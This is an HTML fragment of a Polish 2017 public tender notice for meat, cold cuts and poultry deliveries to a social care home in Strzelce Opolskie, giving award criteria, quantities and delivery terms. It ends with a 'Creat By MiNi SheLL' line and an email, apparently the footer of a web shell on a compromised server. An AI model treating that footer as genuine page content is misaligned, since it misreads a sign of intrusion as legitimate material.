              </b><div style="padding-left: 20px">1. wypełniony druk   oferty  wg  załączonego  wzoru  OFERTA  załącznik  nr  1,
2. formularz  cenowy  na  dostawę  mięsa  i  wędlin   załącznik  nr  2, 
3. formularz  cenowy  na  dostawę  kurczaków  i  artykułów  drobiowych  załącznik  nr  3,4. Wykonawca  - zgodnie  z  art.  24  ust.  11 ustawy  prawo  zamówień  publicznych  w  terminie  3  dni  od  dnia  przekazania  informacji,  o  której  mowa  w  art.  86  ust.  5  ustawy  prawo  zamówień  publicznych  (informacji wskazanych  w  rozdziale  5  pkt. 8 SIWZ)  przekazuje  Zamawiającemu  oświadczenie  o  przynależności  lub  braku  przynależności  do  tej  samej  grupy  kapitałowej,  o  której  mowa  w  art.  24  ust. 1  pkt. 23 ustawy  prawo  zamówień  publicznych  załącznik  nr  8  do  SIWZ.  Wraz  ze  złożeniem  w.w oświadczenia,  Wykonawca  może  przedstawić  dowody,  że  powiązania  z  innym  wykonawcą  nie  prowadzą  do  zakłócenia  konkurencji  w  postępowaniu  o  udzielenie  zamówienia, W  przypadku, gdy  ofertę  podpisują  osoby,  których  upoważnienie do  reprezentacji  nie 
wynika  z  dokumentów  rejestrowych  załączonych  do  oferty,  wymaga  się,  aby Wykonawca  dołączył  do  oferty  oryginał  pełnomocnictwa  do  podpisania  oferty,5.Informacje  zawarte  w  ofercie,  stanowiące  tajemnicę  przedsiębiorstwa  w  rozumieniu       
przepisów  o  zwalczaniu  nieuczciwej  konkurencji  muszą  być  oznaczone  klauzulą: 
 Dokument  stanowi  tajemnicę  przedsiębiorstwa  w  rozumieniu  ustawy  o  zwalczaniu     
 nieuczciwej  konkurencji  i  wydzielone  w  formie  załącznika.



</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja  przydatności do spożycia</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/01/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>załącznik  nr  2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część  I  załącznik  nr  2: mięso  i  wędliny w  ilościach:
Baleron  gotowany  450kg,  boczek  wędzony  surowy  550kg,  flaki  wołowe  krojone  -  400kg,  frankfurterki  75kg,  mięso  wieprzowe gulaszowe pokrojone w kostkę  1600kg,  karczek bez kości  -1400kg,  kaszanka  luzem -350kg,  kiełbasa  śląska  1400kg, kiełbasa biała  20kg, kiełbasa kminkowa -300kg,  kości  wieprzowe (karczkowe lub schabowe) 1000kg,  kości  wołowe  200kg, kiełbasa krakowska wieprzowa  parzona 630kg,  łopatka bez kości  800kg,  metka (cebulowa, paprykowa)  200kg,  kiełbasa mielonka - 300kg, mięso  mielone  (wołowo-wieprzowe)  - 400kg,  mortadela wieprzowa  250kg,  parówka  cieńka  - 800kg,  parówka  gruba -  750kg,  pasztetowa  folia  180kg,  pieczeń  rzymska, cebulowa, paprykowa  160kg, kiełbasa gruba piwna  wieprzowa  150kg, polędwica  drobiowa  - 200kg,  polędwica  z  indyka  - 200kg,  polędwica sopocka  180kg, salceson  biały  w  folii  360kg, schab  bez  kości  - 480kg,  słonina  świeża  zmielona  -  220kg,  szynka  gotowana  -  500kg,  szynka  wieprzowa  mięso b/kości  - 330kg,  kiełbasa  szynkowa  wieprzowa  700kg,  wołowe  na  rolady  - 180kg, kiełbasa  zwyczajna  - 180kg,  żeberka  wieprzowe  1200kg.
     

Zamawiający  dopuszcza  składanie  ofert  częściowych,   obejmujących  jedną  lub dwie  części  zadania.
Wykonawca może  złożyć  ofertę  na  całość  jak  również  na  jedną  z  w/w  części  zamówienia.
Zamówienie  składa  się  z  dwóch  części :
I  część  - zadanie  pod  nazwą:  Sukcesywna  dostawa  mięsa i wędlin dla  Domu  Pomocy  Społecznej  w  Strzelcach  Op. z  filią  w  Szymiszowie  i  filią  w Leśnicy  
ul. Strażacka 8.
II część  - zadanie  pod  nazwą:  Sukcesywna  dostawa kurczaków  i artykułów  drobiowych  dla Domu Pomocy Społecznej w Strzelcach Op. z filią  w  Szymiszowie  i  filią  w   Leśnicy  ul. Strażacka  8.

 
 

15131500-0 Produkty drobiowe 


1.Realizacja zamówienia dla  części  I  załącznik  nr  2  będzie  następować  zgodnie  
z  zasadami:
1.1. Wykonawca  zobowiązuje  się  dostarczyć  asortyment  dwa  razy  w  tygodniu  własnym  transportem  i  na  swój  koszt do  DPS  Filia  Szymiszów  ul. Strzelecka  2.   Pojazdy  do  przewozu  żywności  muszą  spełniać  wymagania  określone  w  Rozporządzeniu  Ministra  Zdrowia  z  dnia  19.12.2002r. (Dz. U. 21/2003 poz. 179) w sprawie  wymagań  sanitarnych  dotyczących  środków  transportu  żywności  w  ilościach  podanych  w  załączniku  nr  2,
1.2.asortyment  zamawianej  dostawy  będzie  uzgadniany sukcesywnie telefonicznie  lub  droga  elektroniczną  co najmniej  na  dwa  dni  przed  dostawą,
1.3.dostawy  na  niedzielę  lub  święto  powinny  następować  w  dniu  poprzedzającym
niedzielę  lub święto,
1.4. przedstawiciel  zamawiającego  jest  obecny  przy  odbiorze  przedmiotu  zamówienia  
lub  inna  osoba  go  zastępująca   ( liczenie, ważenie towaru  i  sprawdzenie  uszkodzeń 
i  terminów  gwarancji  itp.),
1.5.dostarczone  mięso  powinno  być  świeże,  nie  mrożone  i nie  pakowane  próżniowo,    
z terminem  przydatności  do  5  dni  od  dnia  dostawy, 
1.6.dostarczane  sukcesywnie  wędliny  powinny  być  nie  mrożone, pakowane  próżniowo 
i  mieć  aktualną  w  dniu  dostawy  co  najmniej  5  dniową  gwarancję  do  spożycia 
(data  przydatności  do  spożycia),
1.7. wykonawca  gwarantuje  spełnić  wymagane  normy  jakościowe  oraz  dostarczyć asortyment  w  stanie  świeżym  i  w  początkowym  okresie  gwarancji,  odpowiednio oznakowany, produkowany  i  dostarczany  asortyment powinien  być  zgodnie  zachowaniem  wymogów  sanitarno-epidemiologicznych  i  sytemu  HACCP,
1.8.wykonawca  zapewnia  dobrą  jakość  asortymentu,
1.9.wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie
obowiązywania  umowy,
1.10.Zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości,
1.11. Zamawiający  zastrzega  sobie  prawo  możliwości  niewykorzystania  ilości  objętej
umową  oraz  możliwości  zmiany  wybranych  pozycji  w  ramach  niewykorzystanego
asortymentu  objętego  umową  i  wartością  umowy,  powiadamianie  o  zmianie  asortymentu  następować  będzie  telefonicznie  ( za  pisemnym  potwierdzeniem ),   DPS  złoży Wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  i  zwiększeniem  w  terminie  co  najmniej  dwóch  dni  przed  
planowanym  terminem   dostawy.       
1.12. fakturowanie  odbywać  się  będzie  w  częściach  po  każdorazowej  dostawie.
1.13. Zamawiający dopuszcza  zmianę warunków  realizacji  umowy  jedynie  w  zakresie     zmiany  ilości  dostaw  -  poprzez  ich  zmniejszenia,  bądź  zwiększenia poszczególnych              rodzajów  mięsa  i  wędlin  przy  uwzględnieniu   bieżących  potrzeb  zamawiającego:
a)w  przypadku  zwiększenia  ilości  asortymentu do 20% zamówienia,  zamawiający  złoży wykonawcy  wykaz  asortymentu,  oraz  ilość  tegoż  asortymentu,  która  będzie  objęta  zwiększeniem  zmiana  warunków  dochodzi do skutku  w  wypadku,  gdy  wykonawca  w  terminie  do  pięciu  dni  potwierdzi  dostawę  zwiększonej  ilości  asortymentu  po cenach  określonych  w  umowie.  
b)w przypadku  konieczności  zmniejszenia  ilości  asortymentu,  zamawiający  złoży  wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  w  terminie  co  najmniej  dwóch  dni  przed planowanym  terminem dostawy.     
 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9, 15110000-2,
                    15131130-5,
                    15113000-3,
                    15131120-2,
                    15131620-7,
                    15131134-3,
                    15131410-2,
                    15131400-9,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja przydatności do spozycia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>załącznik nr 3<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część  II - załącznik  nr  3 : kurczaki  i  artykuły drobiowe  w ilościach:  :  filet z kury bez skóry  świeży  pojedyńczy  500kg,  kurczak  cały  świeży  - 2700kg,  porcje rosołowe  świeże  - 150kg,  udko z  drobiu świeże  (noga z kurczaka bez kości grzbietowej) - 2200kg, udziec  z  indyka  bez  kości  bez  skóry  -  350kg,  wątróbka  drobiowa  świeża 460kg.Realizacja zamówienia dla  części  II  załącznik  nr  3  będzie  następować  zgodnie  
z  zasadami:
2.1. Wykonawca  zobowiązuje  się  dostarczyć  asortyment  dwa  razy  w  tygodniu  własnym  transportem  i  na  swój  koszt do  DPS  Filia  Szymiszów  ul. Strzelecka  2.   Pojazdy  do  przewozu  żywności  muszą  spełniać  wymagania  określone  w  Rozporządzeniu  Ministra  Zdrowia  z  dnia  19.12.2002r. (Dz. U. 21/2003 poz. 179) w sprawie  wymagań  sanitarnych  dotyczących  środków  transportu  żywności  w  ilościach  podanych  w  załączniku  nr  3,
2.2.asortyment  zamawianej  dostawy  będzie  uzgadniany sukcesywnie telefonicznie  lub  drogą  elektroniczną  co  najmniej  na  dwa  dni  przed  dostawą,
2.3.dostawy  na  niedzielę  lub  święto  powinny  następować  w  dniu  poprzedzającym
niedzielę  lub święto,
2.4. przedstawiciel  zamawiającego  jest  obecny  przy  odbiorze  przedmiotu  zamówienia  
 lub  inna  osoba  go  zastępująca   ( liczenie, ważenie towaru  i  sprawdzenie  uszkodzeń 
 i  terminów  gwarancji  itp.),
2.5. wykonawca  gwarantuje  spełnić  wymagane  normy  jakościowe  oraz  dostarczyć
asortyment  w  stanie  świeżym  i  w  początkowym  okresie  gwarancji,  odpowiednio
oznakowany,  produkowany  i  dostarczany  asortyment powinien  być  zgodnie  zachowaniem  wymogów  sanitarno-epidemiologicznych  i  sytemu  HACCP,
2.6.dostarczony towar  powinien  być  świeży,  nie  mrożony  i nie  pakowany  próżniowo,    
z terminem  przydatności  do  5  dni  od  dnia  dostawy, 
2.7.dostarczana  sukcesywnie  polędwica  powinna  być  nie  mrożona, pakowana  próżniowo 
 i  mieć  aktualną  w  dniu  dostawy  co  najmniej  5  dniową  gwarancję  do  spożycia 
 (data  przydatności  do  spożycia),
2.8.wykonawca  zapewnia  dobrą  jakość  asortymentu  obejmującą  min. braki  uszkodzeń,  
2.9.wykonawca  gwarantuje  niezmienną  cenę  przedmiotu  zamówienia  w  okresie
obowiązywania  umowy,
2.10.Zamawiający  zastrzega  sobie  możliwość  nie  zrealizowania  umowy  w  całości,
2.11.Zamawiający  zastrzega  sobie  prawo  możliwości  niewykorzystania  ilości  objętej
umową  oraz  możliwości  zmiany  wybranych  pozycji  w  ramach  niewykorzystanego
asortymentu  objętego  umową  i  wartością  umowy,  powiadamianie  o  zmianie  asortymentu  następować  będzie  telefonicznie  ( za  pisemnym  potwierdzeniem ), DPS  złoży Wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  i  zwiększeniem  w  terminie  co  najmniej  dwóch  dni  przed  
planowanym  terminem   dostawy.       
2.12.fakturowanie  odbywać  się  będzie  w  częściach  po  każdorazowej  dostawie.
2.13. Zamawiający dopuszcza  zmianę warunków  realizacji  umowy  jedynie  w  zakresie     zmiany  ilości  dostaw  -  poprzez  ich  zmniejszenia,  bądź  zwiększenia poszczególnych              rodzajów  artykułów drobiowych przy  uwzględnieniu   bieżących  potrzeb  zamawiającego:
a)w  przypadku  zwiększenia  ilości  asortymentu do 20% zamówienia,  zamawiający  złoży wykonawcy  wykaz  asortymentu,  oraz  ilość  tegoż  asortymentu,  która  będzie  objęta  zwiększeniem  zmiana  warunków  dochodzi do skutku  w  wypadku,  gdy  wykonawca  w  terminie  do  pięciu  dni  potwierdzi  dostawę  zwiększonej  ilości  asortymentu  po     cenach  określonych  w  umowie.  
b)w przypadku  konieczności  zmniejszenia  ilości  asortymentu,  zamawiający  złoży  wykonawcy  wykaz  asortymentu  oraz  ilość  tego  asortymentu,  która  będzie  objęta  zmniejszeniem  w  terminie  co  najmniej  dwóch  dni  przed planowanym  terminem dostawy.     

    <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15131500-0, 15112000-6,
                    15112100-7,
                    15112300-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>gwarancja przydatności do spożycia</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com